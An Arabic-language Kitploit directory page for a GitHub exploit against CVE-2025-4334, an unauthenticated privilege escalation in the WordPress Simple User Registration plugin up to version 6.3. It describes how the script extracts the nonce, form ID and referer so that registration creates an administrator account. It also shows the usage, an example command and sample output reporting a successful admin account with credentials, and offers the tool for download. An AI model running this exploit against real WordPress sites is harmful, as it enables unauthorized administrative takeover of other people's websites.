Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/nxploited/cve-2025-4334
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-4334

CVE-2025-4334

Simple User Registration <= 6.3 - تصعيد امتيازات بدون مصادقة

عرض المستودع
733منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔓 Simple User Registration <= 6.3 - تصعيد الامتيازات بدون مصادقة

📄 الوصف

إضافة Simple User Registration لووردبريس عرضة لـتصعيد الامتيازات في جميع الإصدارات حتى 6.3 وما يشملها.
ويرجع ذلك إلى قيود غير كافية على قيم user meta التي يمكن توفيرها أثناء التسجيل.
وهذا يتيح لـالمهاجمين غير المصادَقين التسجيل كـمسؤول (administrator).


🛡️ تفاصيل الثغرة

  • النوع: إدارة امتيازات غير سليمة
  • CVE: CVE-2025-4334
  • درجة CVSS: 9.8 (حرجة)
  • متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • تاريخ النشر العام: 25 يونيو 2025
  • آخر تحديث: 26 يونيو 2025

🛠️ سكربت الاستغلال

يقوم السكربت بأتمتة تصعيد الامتيازات عبر إرسال نموذج باستخدام nonce ومعرّف النموذج (form ID) وreferer المستخرجة.

⚙️ الاستخدام

root@kitploit:~
python CVE-2025-4334.py -h
root@kitploit:~
usage: CVE-2025-4334.py [-h] -u URL --form FORM

Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Base WordPress URL (e.g. http://localhost/wordpress/)
  --form FORM    Full URL of the page that contains the registration form

🌐 شرح عنوان URL

  • -u → تثبيت ووردبريس الأساسي (مثال: http://localhost/wordpress/)
  • --form → الرابط الكامل لنموذج التسجيل المعرض للثغرة (مثال: http://localhost/wpr/default-registration/)

🧪 مثال

root@kitploit:~
python CVE-2025-4334.py -u http://localhost/wordpress/ --form http://localhost/wpr/default-registration/

✅ النتيجة

root@kitploit:~
[i] Extracted Nonce   : ffcf0140a8
[i] Extracted Form ID : 76
[i] Referer Path      : /wpr/default-registration/
[i] HTTP Response Code : 200
[i] Server Response    : {"user_id":13,"status":"success","signup":"signup","message":"Registration Done !\r\nUser Register Email not sent, please contact admin","redirect_url_signup":null}

[+] Exploitation Successful
[+] Username   : Nxploitedadmin
[+] First Name : Nxploitedadmin
[+] Last Name  : Nxploitedadmin
[+] Email      : [email protected]
[+] Password   : nxp1234
[+] Role       : administrator

Exploit By : Khaled_alenazi (Nxploited)

⚠️ إخلاء المسؤولية

هذا السكربت مُقدَّم لأغراض تعليمية وبحثية فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.


من إعداد: Khaled_alenazi (Nxploited)

تنزيل الأداة